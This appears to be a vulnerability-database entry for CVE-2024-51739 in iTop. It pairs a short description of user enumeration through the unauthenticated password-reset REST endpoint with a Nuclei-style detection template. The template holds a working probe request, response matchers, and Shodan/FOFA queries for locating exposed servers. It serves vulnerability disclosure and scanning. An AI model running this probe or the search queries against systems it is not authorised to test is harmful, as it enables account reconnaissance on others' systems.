CVE-2024-51739: iTop - User Enumeration via REST Endpoint

日期: 2025-08-01 | 影响软件: iTop | POC: 已公开

漏洞描述

From the webservices/rest.php file, several operations are accessible from an unauthenticated user. One of them is `do_reset_pwd`, allowing to reset a user password. This feature can be abused to perform user enumeration when a non-existent user is provided.

PoC代码[已公开]

id: CVE-2024-51739

info:
  name: iTop - User Enumeration via REST Endpoint
  author: DhiyaneshDk
  severity: medium
  description: |
    From the webservices/rest.php file, several operations are accessible from an unauthenticated user. One of them is `do_reset_pwd`, allowing to reset a user password. This feature can be abused to perform user enumeration when a non-existent user is provided.
  reference:
    - https://www.synacktiv.com/en/advisories/multiple-vulnerabilities-on-itop
    - https://github.com/Combodo/iTop/security/advisories/GHSA-2hmf-p27w-phf9
    - https://nvd.nist.gov/vuln/detail/CVE-2024-51739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-51739
    cwe-id: CWE-200
    epss-score: 0.46896
    epss-percentile: 0.97535
    cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: combodo
    product: itop
    shodan-query: http.html:" itop login"
    fofa-query: body=" itop login"
  tags: cve,cve2024,itop,enum,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/webservices/rest.php?loginop=do_reset_pwd&auth_user=doesnotexist"

    matchers:
      - type: word
        part: body
        words:
          - "<h1>Reset password</h1>"
          - "&#039;doesnotexist&#039; is not a valid login"
        condition: and
# digest: 4b0a00483046022100b651a75ecf428d31c1c0e54a78c07bc9f5316b253a34acff328bb14068d6e8ed022100c0722b69d56ce0b1615560eec0a9a35b02f208e562a50f07207a5b8befce5c1b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐